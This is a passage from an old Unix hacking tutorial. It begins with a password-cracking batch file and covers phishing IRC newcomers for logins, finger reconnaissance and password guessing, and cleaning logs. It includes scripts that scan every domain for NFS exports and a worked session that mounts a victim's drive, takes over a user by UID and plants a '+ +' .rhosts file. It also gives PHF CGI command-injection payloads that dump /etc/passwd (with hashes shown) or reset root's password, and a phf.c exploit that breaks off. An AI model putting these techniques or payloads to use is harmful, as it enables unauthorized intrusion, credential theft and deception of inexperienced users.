jpp -gecos:1 -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.` | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.` | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.` | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.` | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.~ | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.~ | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.~ | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.~ | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.! | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.! | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.! | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.! | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.A | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.A | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.A | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.A | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.a | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.a | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.a | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.a | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.q | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.q | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.q | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.q | jack -stdin %1


jpp -gecos:2 -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %1


jpp -gecos:4 -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %1


jpp -gecos:8 -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %1

--------------- end of jackhash.bat

You can get password files without an account, see next chapter.

------------------
Section 2B.
Talking to newbe's
------------------

There are other ways to get an account without doing much work.  Park yourself
on an irc channel that you made with a title about hacking.  Also try joining
other channels already on the irc.  Channels would include:
#hacking #unix #unixhacking #hack #hackers #hacker #virus #virii
#hackers_hideout or any others you can find.

Now what you are looking for are newbe's looking to learn or exploit their shell
they are on already.  There is always someone out there that does not know as
much as you.  Watch for someone out there that asks a newbe question and gets
no answer or even kicked off the channel.  Here is your mark ;)

/msg him so that others can't see that you are talking to him, and begin to ask
him questions, try to help him, but not too much ;)  Finally tell him that you
can login for him and do it.  This could be to snatch the passwd file or god
knows what.  Promise him the world and get that login password.  Now you have
a start and can start your on-hands learning process.  If you get root on the
system you might not want to expose that to him, but you can feed him other
goodies that will keep him busy while you sniff some other passwords on the
system.

So now if there are some out there that remember i-e when you gave him your
login and password, you can be sure that the above never happened rin ...

I tend to like to help people learn so I am telling the truth when i say I
have dealt honestly with most everyone I have come across.

-------------
Section 2C.
The hard way
-------------

There is another way you can do this.  Be sure that on most big systems
that users do not use secure passwords.  from a shell do this:

finger @domainname.com  Watch I will do a real domain:

[10:35am][/home/ii]finger @starnet.net
[starnet.net]
Login    Name                 Tty   Idle  Login Time   Office     Office Phone
chris    Chris Myers           p2   4:46  Jan 27 11:19
mike     Mike Suter            p1   4:57  Jan 22 16:14
mike     Mike Suter            p5     3d  Jan 16 15:35
root     System Administrator  p3   4:59  Jan 16 10:17
wendt    Catherine Wendt-Bern  p0      3  Jan 21 14:49
[10:35am][/home/ii]

Now we might want to try logging in later, log this information:

Login chris Password try: Chris, chris, myers, Myers, chrismyers, etc...

This one looks good, wendt:Catherine:catherine

Here is another command:

[10:35am][/home/ii]finger -l @starnet.net
[starnet.net]


Login: mike                             Name: Mike Suter
Directory: /usra/staff/mike             Shell: /bin/csh
On since Wed Jan 22 16:14 (CST) on ttyp1, idle 5:26, from mikesbox.starnet.net
On since Thu Jan 16 15:35 (CST) on ttyp5, idle 3 days 22:00, from mikesbox
Last login Sun Jan 26 23:07 (CST) on ttyp2 from hurk
No Plan.

Login: root                             Name: System Administrator
Directory: /root                        Shell: /bin/csh
On since Thu Jan 16 10:17 (CST) on ttyp3, idle 5:28, from mikesbox.starnet.net
Last login Thu Jan 16 18:07 (CST) on ttyp6 from mikesbox.starnet.net
Mail forwarded to:
\chris@admin.starnet.net
#\chris@admin.starnet.net, \mike@admin.starnet.net
No Plan.

Login: wendt                            Name: Catherine Wendt-Bernal
Directory: /usra/staff/wendt            Shell: /bin/csh
On since Tue Jan 21 14:49 (CST) on ttyp0, idle 0:02, from veggedout
No Plan.

You get more info to play with ;)


I know this can make you tired ....

Remember this stuff will log your tries, so if you get on and get root, clean
the logs ;)

Here is a small .c file you can use if you get on.

pop3hack.c
----- cut here

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

/* First, define the POP-3 port - almost always 110 */
#define POP3_PORT               110

/* What we want our program to be masked as, so nosy sys admin's don't kill us */
#define MASKAS                  "vi"

/* Repeat connect or not - remember, logs still report a connection, so
you might want to set this to 0. If set to 0, it will hack until it finds
1 user/password then exit. If set to 1, it will reconnect and try more
user/passwords (until it runs out of usernames) */
#define RECONNECT       0

----- cut here

You could also write a small perl script that will finger @ from a domain
list and cat the response to a file, then when done it will go back and try
to login using pop3d username-username (or other info) and putting the
response into another file for you.

You can ftp to rs.internic.net:
in the domain directory you will find:

com.zone.gz
edu.zone.gz
gov.zone.gz
mil.zone.gz
net.zone.gz
org.zone.gz

download these files and run getdomain.pl (script below) on the domains you
want to target first, in this manor:

"perl getdomain.pl com.zone com >com.all"

What this will do is rip all of the .COM domains and put them into a file
called comm.all.

If you wanted to do all of the .EDU addresses you would type:

perl getdomain.pl edu.zone edu >edu.all

Now you will have a list to use with your probe called edu.all

Here is the perl script

getdomain.pl
---- cut here
#!/usr/bin/perl

# GetDomain By Nfin8 / Invisible Evil
# Questions /msg i-e  or  /msg i^e
#
# Retrieve command line arguments.
my($inputfile, $domain) = @ARGV;
usage() if (!defined($inputfile) || !defined($domain));

# Open and preprocess the input file.
open(INFILE, "<$inputfile") or die("Cannot open file $inputfile for reading!\n");
my(@lines) = ;

# Initialize main data structure.
my(%hash) = {};
my($key) = "";

foreach (@lines) {
  $key = (split(/\ /))[0];
  chop($key);
  next if ((($key =~ tr/.//) < 1) || 
            (uc($domain) ne uc(((split(/\./, $key))[-1]))) || 
            ($key =~ m/root-server/i));
  $hash{$key}++;
}

# Close input file and output data structure to STDOUT.
close(INFILE);

foreach (sort(keys(%hash))) {
  print "$_\n";
}

sub usage {
  print("\n\ngetdomain:\n");
  print("Usage: getdomain [inputfile] [search]\n\n");
  print("Where [search] is one of \'com\', \'edu\', \'gov\', \'mil\' or \'net\'.\n\n");
  exit(0);
}
  
0;
  
---- cut here - end of script -----

To use the script above all you need to do is copy between the lines above
and name it getdomain.pl, now copy it into the unix os and type
chmod +x getdomain.pl

Now it is ready to run with the command lines above.

------------------------------------------
Section 2D.
using Mount to gain access to unix systems
------------------------------------------

This is not hard to do and there are many systems out there that are mountable.
Mount is a command in unix that will allow you to mount remote machines drives
you yours.  This is done so you can do installs from other machines, or just
share drives or directories across the network.  The problem is that many
admins are good with unix commands or setup.  Or maybe they are just plain
lazy and mount the drives with world access not understanding that the world
can mount the drive and gain write access to their users directories.

What you will need to get started here is a hacked root account.  To be able to
mount the remote drive and gain access you will need to modify the system's
password file and use the su command.

Ok let's say we have root access. let's get started!

You can see if another system has mountable drives by using the showmount
command.

From root account:

$root> showmount -e wwa.com
mount clntudp_create: RPC: Port mapper failure - RPC: Unable to receive

Ok, no problem, this domain will not work, go on to the next one...

$root> showmount -e seva.net
Export list for seva.net:
/var/mail                                        pluto.seva.net
/home/user1                                      pluto.seva.net
/usr/local                                       pluto.seva.net,rover.seva.net
/export/X11R6.3                                  rover.seva.net
/export/rover                                    rover.seva.net,pluto.seva.net
/export/ftp/linux-archive/redhat-4.1/i386/RedHat (everyone)

Notice the (everyone), this would be good if we wanted to install linux
from this guy's box, but we want open directories to users.... so go on to
the next one...

$root> showmount -e XXXXX.XXX < this one worked ... find your own ;)
Export list for XXXXX.XXX:
/export/home (everyone)

Now this guy mounted his home directory, the user accounts are off of the home
directory ;) and look above ... (everyone) can access it!


Ok, this section was to show you how to see if they are mountable, in the next
section i will show you how to mount and hack it.  But for now, here is a
script that will scan for EVERY DOMAIN on the internet that is mountable and
log them for you.

To use this script simply use the domain ripper in the PHF section and download
the needed files from rs.internic.net rip some domains and name the file
'domains' and startup the script.  To make it run in the background put a
& after the command.  like this: cmount.pl&

How it works:

When you run the file it will go to the domains list and run showmount -e
on each domain, if it finds that there is a return on mountable drives
it will save the info in the current directory in files named:
domain.XXX.export.  All you have to do is view the files and mount the drives!

--------------- start of cmount.pl
#!/usr/bin/perl -w
#
# Check NFS exports of hosts listed in file.
# (Hosts are listed, once per line with no additional whitespaces.)
#
# ii@dormroom.pyro.net - 2/27/97.

# Assign null list to @URLs which will be added to later.
my(@result) = ();
my(@domains) = ();
my($program) = "showmount -e ";

# Pull off filename from commandline. If it isn't defined, then assign default.
my($DomainFilename) = shift;
$DomainFilename = "domains" if !defined($DomainFilename);

# Do checking on input.
die("mountDomains: $DomainFilename is a directory.\n") if (-d $DomainFilename);
 
# Open $DomainFilename.
open(DOMAINFILE, $DomainFilename) or 
  die("mountDomains: Cannot open $DomainFilename for input.\n");
  
while () {
  chomp($_);
  print "Now checking: $_";

  # Note difference in program output capture from "geturl.pl".  
  open (EXECFILE, "$program $_ |");
  @execResult = ;
  next if (!defined($execResult[0]));
  if ($execResult[0] =~ /^Export/) {
    print " - Export list saved.";
    open (OUTFILE, ">$_.export");
    foreach (@execResult) {
      print OUTFILE;
    }
    close (OUTFILE);
  }
  close(EXECFILE);
  print "\n";
}
  
# We are done. Close all files and end the program.
close (DOMAINFILE);

0;
----------------- end of cmount.pl

Ok, now on to mounting the drives ....

lets say we did a showmount -e domain.com and got back:

Export list for domain.com:
/   (everyone)
/p1 (everyone)
/p2 (everyone)
/p3 (everyone)
/p5 (everyone)
/p6 (everyone)
/p7 (everyone)
/var/spool/mail titan,europa,galifrey
/tmp            (everyone)

We would want to mount /  .. yup .... this guy has his entire system mountable!

$root> mkdir /tmp/mount
$root> mount -nt nfs domain.com:/ /tmp/mount

If he had the home directory mountable the command would be:

$root> mount -nt nfs domain.com:/home /tmp/mount

To unmount the system, make sure you are out of the directory and type:
$root> umount /tmp/mount

Make sure you make the mount directory first, you can make this anywhere on the
system that you want.  If the systems /mnt directory is empty you can use it
also.

Ok this is for real:

bash# ls -al /mnt  ; making sure the mnt dir is empty
ls: /mnt: No such file or directory ; there was not even a dir there ;)
bash# mkdir /mnt ; lets make one for them rin
bash# mount -nt nfs xxxxxx.xxx:/export/usr /mnt ; let's mount the sucker ...
bash# cd /mnt ; changing to the mounted drive...
bash# ls ; just the plain dir ..
TT_DB             home              raddb             share
back              local             radius-961029.gz  www
exec              lost+found        radius-961029.ps
bash# ; there is is up there, the home dir ... oh good ...
bash# cd home
bash# ls -l  ; long directory listing ... tom is looking good here ;)
total 18
drwxr-xr-x   2 judy     other         512 Feb  1 10:41 garry
drwxr-xr-x  69 infobahn other        5632 Mar 10 01:42 horke
drwxr-xr-x  11 301      other        2048 Mar  1 10:25 jens
drwxr-xr-x   2 300      other         512 Oct 15 07:45 joerg
drwxr-xr-x   2 604      other         512 Feb  8 13:00 mailadmin
drwxr-xr-x   2 melissa  other         512 Sep 27 06:15 mk
drwxr-xr-x   6 news     news          512 Mar  6  1996 news
drwxr-xr-x   2 303      other         512 Jan 24 04:17 norbert
drwxr-xr-x   4 jim      other         512 Sep 27 06:16 pauk
drwxr-xr-x   2 302      other         512 Mar  1 10:10 tom
drwxr-xr-x   5 601      daemon        512 Jan 26  1996 viewx
drwxr-xr-x  10 15       audio         512 Oct 17 08:03 www
bash# ; notice tom is user number 302 ... hmmm lets put him in our passwd file
bash# pico /etc/passwd
tom:x:302:2::/home:/bin/bash ; this should do it ;)
bash# su - tom ; su to the tom account ...
bash$ ls -l
total 18
drwxr-xr-x   2 judy     other         512 Feb  1 10:41 garry
drwxr-xr-x  69 infobahn other        5632 Mar 10 01:42 horke
drwxr-xr-x  11 301      other        2048 Mar  1 10:25 jens
drwxr-xr-x   2 300      other         512 Oct 15 07:45 joerg
drwxr-xr-x   2 604      other         512 Feb  8 13:00 mailadmin
drwxr-xr-x   2 melissa  other         512 Sep 27 06:15 mk
drwxr-xr-x   6 news     news          512 Mar  6  1996 news
drwxr-xr-x   2 303      other         512 Jan 24 04:17 norbert
drwxr-xr-x   4 jim      other         512 Sep 27 06:16 pauk
drwxr-xr-x   2 tom      other         512 Mar  1 10:10 tom
drwxr-xr-x   5 601      daemon        512 Jan 26  1996 view
drwxr-xr-x  10 15       audio         512 Oct 17 08:03 www
bash$ ; NOTICE above that toms user number is gone ... we now own his dir!
bash$ echo + +>>tom/.rhosts  ; this will make a file in his dir called .rhosts
bash$ ;inside .rhosts will be wild cards + +  for anyone to rlogin to his account
bash$ rlogin xxxxx.xxx  we are tom on our machine, so lets just rlogin plain.
Last login: Fri Mar  7 00:16:03 from xxxxx.xxxxxxxxxx
Sun Microsystems Inc.   SunOS 5.5       Generic November 1995
>  ; yup we are in!
> ls -al
total 8
drwxr-xr-x   2 tom      group        512 Mar  1 17:10 .
drwxr-xr-x  14 tom      group        512 Jan 24 11:16 ..
-rw-r--r--   1 tom      group        144 Dec 30 15:32 .profile
-rw-r--r--   1 tom      bin            8 Mar 11 08:26 .rhosts
>

So now we have access, so lets just hack this system ... oops, that is another
lesson!  Have pun!

---------------------
Chapter III
Getting passwd files
---------------------

Here are some ways to get password files from unix systems.  Most of them
you will need an account, but there is still a way to access to the system
without having an account.  Here you will learn the difference between a
regular passwd file and a shadowed passwd file.  You will also learn a way
to read the shadowed password file.

------------------
Section 3A
PHF WWW PH Query
------------------

There is a program in the WWW cgi-bin directory called phf, if the file
is there, and has permission x, you can access it by using the www, or
a text version browser in linux called lynx.  Now you can read files on the
system (yup .. /etc/passwd) and save them to files local in your computer.

There are many things we can get done here.  If the server is running their
httpd server as root owner, we can be root by using phf and even change an
account password on the machine.

I will include a perl script here that will auto check all of the systems out
there by using the getdomain.pl script above and check what the server is
running under.  If it is running under root, it will just log the id, if the
server is not running under root, it will auto get the passwd file from the
/etc directory and name it domainname.???.passwd.

I will also attach a script that will allow you to use a simple command from
a shell and if phf is on the system allow you to pipe commands from the shell
to the remote system with one command line.

Ok now that you know what is coming, lets teach you how to use phf.

Use your favorite web browser, or the text version in unix called most of
the time lynx, on some systems www.

After the screen comes up type the letter g, now a line appears like below:

URL to open:
  Arrow keys: Up and Down to move. Right to follow a link; Left to go back.
  H)elp O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history list

You type:

URL to open: http://xxx.org/cgi-bin/phf/?Qalias=x%0aid
  Arrow keys: Up and Down to move. Right to follow a link; Left to go back.
  H)elp O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history list

It returns:

                                 QUERY RESULTS



   /usr/local/bin/ph -m alias=x id

uid=65534(nobody) gid=65535(nogroup) groups=65535(nogroup)


So here we see it is running under a user (nobody), so we can be a user named
nobody on this system.  We are not root, but this will have to do ;)

Notice the command line:

http://afp.org/cgi-bin/phf/?Qalias=x%0aid

The id was the command to the server to give us the id of the user.  Some times
you will have to give the full path to the file you want to run, in this case
it would have been: http://afp.org/cgi-bin/phf/?Qalias=x%0a/usr/bin/id

Notice that after the %0a you start your command line.  If you need to enter
a space you would put a %20 instead of the space.  Here would be some sample
command lines. I will start them with %0a

Cat the passwd file
%0a/bin/cat%20/etc/passwd

Get a long directory of the /etc directory of all files starting with pass
%0als%20-al%20/etc/pass*

backup the passwd file if you have root access to httpd to passwd.my
%0acp%20/etc/passwd%20/etc/passwd.my

Change the root passwd (if the server will let you (most times it works)
%0apasswd%20root

(the above should let you login without a password, make sure to copy the
passwd.my file over the passwd file right away, and then delete the backup,
then make yourself an suid bash shell somewhere and rename it, sniff to get
your passwords)

If you know how to type commands in unix and don't forget that you need to
use %20 in the place of spaces, you will not have any problems!

Ok lets cat the passwd file on this box ;)

URL to open: http://xxx.org/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd

We get:


                                 QUERY RESULTS



   /usr/local/bin/ph -m alias=x cat /etc/passwd

root:R0rmc6lxVwi5I:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:-2:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
bhilton:LkjLiWy08xIWY:501:100:Bob Hilton:/home/bhilton:/bin/bash
web:Kn0d4HJPfRSoM:502:100:Web Master:/home/web:/bin/bash
mary:EauDLA/PT/HQg:503:100:Mary C. Hilton:/home/mary:/bin/bash

A small passwd file rin

If you want to save this to a file in your local directory, just choose the
print option in the text browser and you will get an option to save the file
in your home directory.

Lets learn something here:

mary:EauDLA/PT/HQg:503:100:Mary C. Hilton:/home/mary:/bin/bash
1   :2            :3  :4  :5             :6         :7

1=username 2=encrypted password 3=user number 4=groop id 5=real name
6=home directory 7=shell

Ok, lets say you do not want to keep using the WWW browser, here is a script
you can compile to just type regular commands from your shell.

phf.c
------ cut here----

/* Some small changes for efficiency by snocrash. */
/*
 * cgi-bin phf exploit by loxsmith [xf]
 *
 * I wrote this in C because not every system is going to have lynx.  Also,
 * this saves the time it usually takes to remember the syntatical format
 * of the exploit.  Because of the host lookup mess, this will take
 * approximately 12 seconds to execute with average network load.  Be patient.
 *
 */

#include 
#include 
#include 
#include 
#include 
#include 
#include 

int main(argc, argv)
     int argc;
     char **argv;
{
